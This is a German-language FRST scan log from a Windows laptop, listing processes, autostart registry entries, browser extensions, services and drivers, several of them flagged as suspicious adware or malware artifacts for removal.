(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(pdfforge GmbH) C:\Program Files (x86)\PDF Architect\ConversionService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\TrayManager.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\Digital Imaging\Fax\Fax Driver 0.6 Base\hppfaxprintersrv.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\PSUService.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(FUJITSU LIMITED) C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe
(Fujitsu Technology Solutions) C:\Fujitsu\Programs\DeskUpdate\DeskUpdateNotifier.exe
(shbox.de) C:\Program Files (x86)\FreePDF_XP\fpassist.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\StatusAlerts\bin\HPStatusAlerts.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\Bluetooth Headset Helper.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Plugfree NETWORK\PFNAutoCon.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Plugfree NETWORK\PFNetDm.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Plugfree NETWORK\PFNTray.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Mozilla Corporation) C:\Program Files (x86)\Firefox\Firefox.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13374568 2011-12-13] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277992 2011-11-15] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2816808 2011-08-11] (Synaptics Incorporated)
HKLM\...\Run: [LoadFUJ02E3] => C:\Program Files\Fujitsu\FUJ02E3\fuj02e3.exe [76104 2011-11-24] (FUJITSU LIMITED)
HKLM\...\Run: [PSUTility] => C:\Program Files\Fujitsu\PSUtility\TrayManager.exe [205168 2011-10-03] (FUJITSU LIMITED)
HKLM\...\Run: [LoadFujitsuQuickTouch] => C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe [158024 2011-10-01] (FUJITSU LIMITED)
HKLM\...\Run: [LoadBtnHnd] => C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe [23368 2011-10-01] (FUJITSU LIMITED)
HKLM\...\Run: [HP LaserJet 200 color MFP M276 Series Fax] => C:\Program Files (x86)\HP\Digital Imaging\Fax\Fax Driver 0.6 Base\hppfaxprintersrv.exe [3706424 2011-10-09] (Hewlett-Packard Company)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2787264 2016-01-12] (NVIDIA Corporation)
HKLM\...\Run: [emsisoft anti-malware] => "c:\program files\emsisoft anti-malware\a2guard.exe" /d=60
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-01-17] (Intel Corporation)
HKLM-x32\...\Run: [IndicatorUtility] => C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe [48752 2010-09-30] (FUJITSU LIMITED)
HKLM-x32\...\Run: [DeskUpdateNotifier] => c:\Fujitsu\Programs\DeskUpdate\DeskUpdateNotifier.exe [101144 2015-06-15] (Fujitsu Technology Solutions)
HKLM-x32\...\Run: [YouCam Service] => "C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe" /s
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [FreePDF Assistant] => C:\Program Files (x86)\FreePDF_XP\fpassist.exe [371200 2011-02-23] (shbox.de)
HKLM-x32\...\Run: [StatusAlerts] => C:\Program Files (x86)\HP\StatusAlerts\bin\HPStatusAlerts.exe [313248 2012-07-18] (Hewlett-Packard Company)
HKLM-x32\...\Run: [FUJ02B1_Apps] => C:\Program Files (x86)\Fujitsu\FUJ02B1\CheckBatteryPack.exe [367424 2016-05-11] (FUJITSU LIMITED)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27219928 2016-11-15] (Skype Technologies S.A.)
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\MountPoints2: {c5240729-fc2c-11e3-b801-c01885aadbce} - F:\DTVP_Launcher.exe
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\MountPoints2: {fd17f95e-28b3-11e2-b434-806e6f6e6963} - D:\wubi.exe
HKLM\...\Providers\1vmox6d7: C:\Program Files (x86)\Jujalyclartion Launcher\local64spl.dll
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [175368 2016-02-09] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [153208 2016-02-09] (NVIDIA Corporation)
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
ShellExecuteHooks: Kein Name - {3359997A-2343-11E7-891A-64006A5CFC23} - C:\Users\Markus\AppData\Roaming\Coawupycedught\Reatospcicer.dll -> Keine Datei
ShellIconOverlayIdentifiers: [MemopalBackedUp] -> {8ED3CC2D-6BC2-43AD-8C43-F51FBB413AE6} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers: [MemopalError] -> {B9CA6E12-7975-4997-B5BD-CA12ECE0FEAD} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers: [MemopalPartiallyBackedUp] -> {95DDC869-FC98-4D47-BD34-2EDC9AA09C01} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers: [MemopalToBackup] -> {2CDD871E-60EB-40BD-9721-A1CB57042F75} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalBackedUp] -> {8ED3CC2D-6BC2-43AD-8C43-F51FBB413AE6} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalError] -> {B9CA6E12-7975-4997-B5BD-CA12ECE0FEAD} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalPartiallyBackedUp] -> {95DDC869-FC98-4D47-BD34-2EDC9AA09C01} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalToBackup] -> {2CDD871E-60EB-40BD-9721-A1CB57042F75} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2012-01-26]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LaunchCenter.lnk [2012-01-27]
ShortcutTarget: LaunchCenter.lnk -> C:\Program Files\Fujitsu\LaunchCenter\lcStarter.exe (Fujitsu Technology Solutions)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LaunchCenter.lnk [2012-01-27]
ShortcutTarget: LaunchCenter.lnk -> C:\Program Files\Fujitsu\LaunchCenter\lcStarter.exe (Fujitsu Technology Solutions)
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Hosts: 0.0.0.1	mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.179.1
Tcpip\..\Interfaces\{1EDD786C-676B-4E94-B44B-9E94A619AFFB}: [DhcpNameServer] 192.168.179.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494003156&z=d5b8f9fcee6cd9bab9c326egazctbzee4e1c9gewdo&from=che0812&uid=IntensoXXSSDXSataXIII_AA000000000000003571&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = 
SearchScopes: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> {C01A2B73-D42B-46F8-AFF0-E5207570AE93} URL = 
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-22] (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: PDF Architect Helper -> {3A2D5EBA-F86D-4BD3-A177-019765996711} -> C:\Program Files (x86)\PDF Architect\PDFIEHelper.dll [2013-04-08] (pdfforge GmbH)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-22] (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> Kein Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  Keine Datei
Toolbar: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Keine Datei
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2016-09-23] (Skype Technologies)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF DefaultProfile: tuoa89rc.default
FF ProfilePath: C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\tuoa89rc.default [2017-05-20]
FF Homepage: Mozilla\Firefox\Profiles\tuoa89rc.default -> rp-online.
FF ProfilePath: C:\Users\Markus\AppData\Roaming\Firefox\Firefox\Profiles\tuoa89rc.default [2017-05-20]
FF Homepage: Firefox\Firefox\Profiles\tuoa89rc.default -> hxxp://www.rp-online.de/
FF Extension: (SimilarWeb) - C:\Users\Markus\AppData\Roaming\Firefox\Firefox\Profiles\tuoa89rc.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-04-28] [ist nicht signiert]
FF Extension: (HSearch) - C:\Users\Markus\AppData\Roaming\Firefox\Firefox\Profiles\tuoa89rc.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-28] [ist nicht signiert]
FF Extension: (FF Adr) - C:\Users\Markus\AppData\Roaming\Firefox\Firefox\Profiles\tuoa89rc.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-28] [ist nicht signiert]
FF Extension: (Deutsch (DE) Language Pack) - C:\Users\Markus\AppData\Roaming\Firefox\Firefox\Profiles\tuoa89rc.default\Extensions\langpack-de@firefox.mozilla.org.xpi [2017-05-03] [ist nicht signiert]
FF Extension: (NoScript) - C:\Users\Markus\AppData\Roaming\Firefox\Firefox\Profiles\tuoa89rc.default\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2017-05-12]
FF HKLM-x32\...\Firefox\Extensions: [FFPDFArchitectConverter@pdfarchitect.com] - C:\Program Files (x86)\PDF Architect\FFPDFArchitectExt
FF Extension: (PDF Architect Converter For Firefox) - C:\Program Files (x86)\PDF Architect\FFPDFArchitectExt [2017-04-27] [ist nicht signiert]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-13] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [Keine Datei]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-13] ()
FF Plugin-x32: @canon.com/MycameraPlugin -> C:\Program Files (x86)\Canon\MyCamera Download Plugin\NPCIG.dll [2008-10-15] (CANON INC.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.52 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2011-12-01] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2011-12-01] (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Keine Datei]
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-02-09] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-02-09] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome: 
=======
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome - Chrome.exe

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S2  MicrosoftCRLSrv; C:\Windows\System32\svchost.exe [27648 2012-01-06] (Microsoft Corporation)
S2  MicrosoftCRLSrv; C:\Windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation)
R2 AAV UpdateService; C:\Program Files (x86)\Lexware\AAVUpdateManager\aavus.exe [128296 2008-10-24] ()
R2 Avira Secure Backup Crawler; C:\Program Files\Avira Secure Backup\Avira Secure BackupCrawler.exe [2258000 2013-11-06] () [Datei ist nicht signiert]
S2 CSHMDR; C:\Windows\System32\svchost.exe [27648 2012-01-06] (Microsoft Corporation)
S2 CSHMDR; C:\Windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation)
S2 CWASRE; C:\Windows\System32\svchost.exe [27648 2012-01-06] (Microsoft Corporation)
S2 CWASRE; C:\Windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation)
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [225280 2011-08-05] (DTS, Inc)
R2 FUJ02E3Service; C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe [76104 2011-11-24] (FUJITSU LIMITED)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-01-12] (NVIDIA Corporation)
R2 HP DS Service; C:\Program Files (x86)\HP\HPBDSService\HPBDSService.exe [13824 2011-10-17] (Hewlett-Packard Company) [Datei ist nicht signiert]
R2 HP LaserJet Service; C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe [164864 2012-05-02] (HP) [Datei ist nicht signiert]
S2 IISvr; C:\Windows\System32\svchost.exe [27648 2012-01-06] (Microsoft Corporation)
S2 IISvr; C:\Windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [161560 2011-12-16] (Intel Corporation)
S2 Kitty; C:\windows\system32\svchost.exe [27648 2012-01-06] (Microsoft Corporation)
S2 Kitty; C:\windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273168 2011-12-08] ()
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [50688 2011-04-13] (Hewlett-Packard) [Datei ist nicht signiert]
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-01-12] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6308288 2016-01-12] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [4812736 2016-01-12] (NVIDIA Corporation)
R2 PDF Architect Helper Service; C:\Program Files (x86)\PDF Architect\HelperService.exe [1320496 2013-04-08] (pdfforge GmbH)
R2 PDF Architect Service; C:\Program Files (x86)\PDF Architect\ConversionService.exe [799280 2013-04-08] (pdfforge GmbH)
R2 PFNService; C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe [2213376 2011-12-22] (FUJITSU LIMITED) [Datei ist nicht signiert]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [66048 2011-04-13] (Hewlett-Packard) [Datei ist nicht signiert]
R2 PowerSavingUtilityService; C:\Program Files\Fujitsu\PSUtility\PSUService.exe [63856 2011-10-03] (FUJITSU LIMITED)
S2 SNARE; C:\Windows\System32\svchost.exe [27648 2012-01-06] (Microsoft Corporation)
S2 SNARE; C:\Windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation)
S2 SNAREA; C:\Windows\System32\svchost.exe [27648 2012-01-06] (Microsoft Corporation)
S2 SNAREA; C:\Windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation)
S2 VNASRE; C:\Windows\System32\svchost.exe [27648 2012-01-06] (Microsoft Corporation)
S2 VNASRE; C:\Windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation)
S2 WANARE; C:\Windows\System32\svchost.exe [27648 2012-01-06] (Microsoft Corporation)
S2 WANARE; C:\Windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S2 WindowsOfficeSrv; C:\Windows\System32\svchost.exe [27648 2012-01-06] (Microsoft Corporation) <==== ACHTUNG
S2 WindowsOfficeSrv; C:\Windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation) <==== ACHTUNG
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [594704 2011-12-08] (Intel® Corporation)
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 swpvr; C:\ProgramData\Microsoft\Software\Shadow\Provider.dll [X]
S2 WinAppSvr; C:\ProgramData\Microsoft\AppV\setup\install.dll [X] <==== ACHTUNG
S2 WinSAPSvc; C:\Users\Markus\AppData\Roaming\WinSAPSvc\WinSAP.dll [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [134696 2011-11-23] (Broadcom Corporation.)
R0 FBIOSDRV; C:\Windows\System32\Drivers\FBIOSDRV.sys [21104 2009-06-24] (FUJITSU LIMITED)
R3 FUJ02B1; C:\Windows\System32\DRIVERS\FUJ02B1.sys [59152 2016-05-11] (FUJITSU LIMITED)
R3 FUJ02E3; C:\Windows\system32\drivers\FUJ02E3.sys [7296 2006-11-01] (FUJITSU LIMITED)
S3 HTCAND64; C:\Windows\System32\Drivers\ANDROIDUSB.sys [33736 2009-11-02] (HTC, Corporation) [Datei ist nicht signiert]
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-01-12] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [47760 2015-12-18] (NVIDIA Corporation)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1812608 2011-12-28] ()
S1 87f0b4a3c84aef52d85483d98a273fd7; \??\C:\Windows\system32\drivers\87f0b4a3c84aef52d85483d98a273fd7.sys [X]
S3 clwvd; system32\DRIVERS\clwvd.sys [X]
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ACHTUNG

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-20 17:39 - 2017-05-20 17:39 - 00026515 _____ C:\Users\Markus\Desktop\FRST.txt
2017-05-20 17:24 - 2017-05-20 17:24 - 00000085 _____ C:\Windows\wininit.ini
2017-05-20 17:16 - 2017-05-20 17:34 - 02429952 _____ (Farbar) C:\Users\Markus\Desktop\FRST64.exe
2017-05-18 17:24 - 2017-05-20 17:39 - 00000000 ____D C:\FRST
2017-05-18 17:24 - 2017-05-18 17:24 - 02429952 _____ (Farbar) C:\Users\Markus\Downloads\FRST64.exe
2017-05-18 17:17 - 2017-05-18 18:51 - 00000000 ____D C:\Program Files (x86)\Prodak
2017-05-17 14:15 - 2017-05-17 14:15 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-16 22:51 - 2017-05-20 07:48 - 00000000 ____D C:\Program Files\Emsisoft Anti-Malware
2017-05-16 18:48 - 2017-05-17 14:18 - 00002146 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-05-13 20:30 - 2017-05-13 20:30 - 00000000 ____D C:\Users\Markus\AppData\Local\{991DAACD-0AC8-4F88-9A36-26B7D28A3D35}
2017-05-13 19:31 - 2017-05-13 19:31 - 05821944 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2017-05-10 15:56 - 2017-04-28 03:14 - 05547240 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-05-10 15:56 - 2017-04-28 03:14 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-05-10 15:56 - 2017-04-28 03:14 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-05-10 15:56 - 2017-04-28 03:14 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-05-10 15:56 - 2017-04-28 03:14 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
